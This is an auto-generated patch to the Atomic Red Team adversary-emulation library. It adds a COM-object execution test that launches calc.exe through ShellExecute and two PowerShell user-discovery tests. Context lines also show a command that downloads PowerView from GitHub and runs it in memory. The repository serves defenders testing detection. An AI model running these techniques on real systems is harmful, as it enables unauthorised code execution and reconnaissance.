From 13200b42f9cd68d3dbff9f5ba9aa094ffb22a2b9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 23 Mar 2022 17:44:48 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 4 ++ atomics/Indexes/Indexes-CSV/windows-index.csv | 4 ++ atomics/Indexes/Indexes-Markdown/index.md | 4 ++ .../Indexes/Indexes-Markdown/windows-index.md | 4 ++ atomics/Indexes/index.yaml | 56 +++++++++++++++ atomics/T1033/T1033.md | 69 +++++++++++++++++++ atomics/T1546.015/T1546.015.md | 36 ++++++++++ 7 files changed, 177 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 335b8d69..f763fb6f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -188,6 +188,7 @@ privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PR privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell +privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell @@ -674,6 +675,7 @@ persistence,T1546.001,Change Default File Association,1,Change Default File Asso persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell +persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash @@ -948,6 +950,8 @@ discovery,T1049,System Network Connections Discovery,4,System Discovery using Sh discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell +discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell +discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index a45526c2..12258340 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -130,6 +130,7 @@ privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell +privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell privilege-escalation,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt @@ -466,6 +467,7 @@ persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell +persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt @@ -647,6 +649,8 @@ discovery,T1049,System Network Connections Discovery,2,System Network Connection discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell +discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell +discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3155f297..11060e2d 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -301,6 +301,7 @@ - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos] - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md) - Atomic Test #1: COM Hijacking - InprocServer32 [windows] + - Atomic Test #2: Powershell Execute COM Object [windows] - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - Atomic Test #1: ListCronjobs [containers] - Atomic Test #2: CreateCronjob [containers] @@ -1050,6 +1051,7 @@ - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md) - Atomic Test #1: COM Hijacking - InprocServer32 [windows] + - Atomic Test #2: Powershell Execute COM Object [windows] - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) - Atomic Test #1: ListCronjobs [containers] @@ -1473,6 +1475,8 @@ - Atomic Test #1: System Owner/User Discovery [windows] - Atomic Test #2: System Owner/User Discovery [linux, macos] - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows] + - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows] + - Atomic Test #5: GetCurrent User with PowerShell Script [windows] - [T1007 System Service Discovery](../../T1007/T1007.md) - Atomic Test #1: System Service Discovery [windows] - Atomic Test #2: System Service Discovery - net.exe [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 670521ae..b0a32203 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -226,6 +226,7 @@ - Atomic Test #1: Change Default File Association [windows] - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md) - Atomic Test #1: COM Hijacking - InprocServer32 [windows] + - Atomic Test #2: Powershell Execute COM Object [windows] - [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md) - Atomic Test #1: Access Token Manipulation [windows] - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -755,6 +756,7 @@ - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md) - Atomic Test #1: COM Hijacking - InprocServer32 [windows] + - Atomic Test #2: Powershell Execute COM Object [windows] - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1053,6 +1055,8 @@ - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - Atomic Test #1: System Owner/User Discovery [windows] - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows] + - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows] + - Atomic Test #5: GetCurrent User with PowerShell Script [windows] - [T1007 System Service Discovery](../../T1007/T1007.md) - Atomic Test #1: System Service Discovery [windows] - Atomic Test #2: System Service Discovery - net.exe [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 66fa8489..07e3fc05 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -12831,6 +12831,21 @@ privilege-escalation: cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell + - name: Powershell Execute COM Object + auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb + description: Use the PowerShell to execute COM CLSID object. + Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ + supported_platforms: + - windows + executor: + command: | + $o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")) + $item = $o.Item() + $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) + cleanup_command: 'Get-Process -Name "*calc" | Stop-Process + +' + name: powershell T1053.007: technique: external_references: @@ -44194,6 +44209,21 @@ persistence: cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore name: powershell + - name: Powershell Execute COM Object + auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb + description: Use the PowerShell to execute COM CLSID object. + Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/ + supported_platforms: + - windows + executor: + command: | + $o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")) + $item = $o.Item() + $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) + cleanup_command: 'Get-Process -Name "*calc" | Stop-Process + +' + name: powershell T1554: technique: created: '2020-02-11T18:18:34.279Z' @@ -59662,6 +59692,32 @@ discovery: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose name: powershell + - name: User Discovery With Env Vars PowerShell Script + auto_generated_guid: dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 + description: Use the PowerShell environment variables to identify the current + logged user. + supported_platforms: + - windows + executor: + command: "[System.Environment]::UserName | Out-File -FilePath .\\CurrentactiveUser.txt + \n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n" + cleanup_command: 'Remove-Item -Path .\CurrentactiveUser.txt -Force + +' + name: powershell + - name: GetCurrent User with PowerShell Script + auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b + description: Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET + class to identify the logged user. + supported_platforms: + - windows + executor: + command: "[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File + -FilePath .\\CurrentUserObject.txt\n" + cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force + +' + name: powershell T1007: technique: created: '2017-05-31T21:30:21.315Z' diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 7e46c994..550a4dab 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -12,6 +12,10 @@ Utilities and commands that acquire this information include whoami - [Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)](#atomic-test-3---find-computers-where-user-has-session---stealth-mode-powerview) +- [Atomic Test #4 - User Discovery With Env Vars PowerShell Script](#atomic-test-4---user-discovery-with-env-vars-powershell-script) + +- [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script) +
@@ -116,4 +120,69 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29 +
+
+ +## Atomic Test #4 - User Discovery With Env Vars PowerShell Script +Use the PowerShell environment variables to identify the current logged user. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** dcb6cdee-1fb0-4087-8bf8-88cfd136ba51 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt +$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append +``` + +#### Cleanup Commands: +```powershell +Remove-Item -Path .\CurrentactiveUser.txt -Force +``` + + + + + +
+
+ +## Atomic Test #5 - GetCurrent User with PowerShell Script +Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt +``` + +#### Cleanup Commands: +```powershell +Remove-Item -Path .\CurrentUserObject.txt -Force +``` + + + + +
diff --git a/atomics/T1546.015/T1546.015.md b/atomics/T1546.015/T1546.015.md index 374164ce..00d8a97c 100644 --- a/atomics/T1546.015/T1546.015.md +++ b/atomics/T1546.015/T1546.015.md @@ -8,6 +8,8 @@ Adversaries can use the COM system to insert malicious code that can be executed - [Atomic Test #1 - COM Hijacking - InprocServer32](#atomic-test-1---com-hijacking---inprocserver32) +- [Atomic Test #2 - Powershell Execute COM Object](#atomic-test-2---powershell-execute-com-object) +
@@ -65,4 +67,38 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #2 - Powershell Execute COM Object +Use the PowerShell to execute COM CLSID object. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 752191b1-7c71-445c-9dbe-21bb031b18eb + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39")) +$item = $o.Item() +$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + +#### Cleanup Commands: +```powershell +Get-Process -Name "*calc" | Stop-Process +``` + + + + +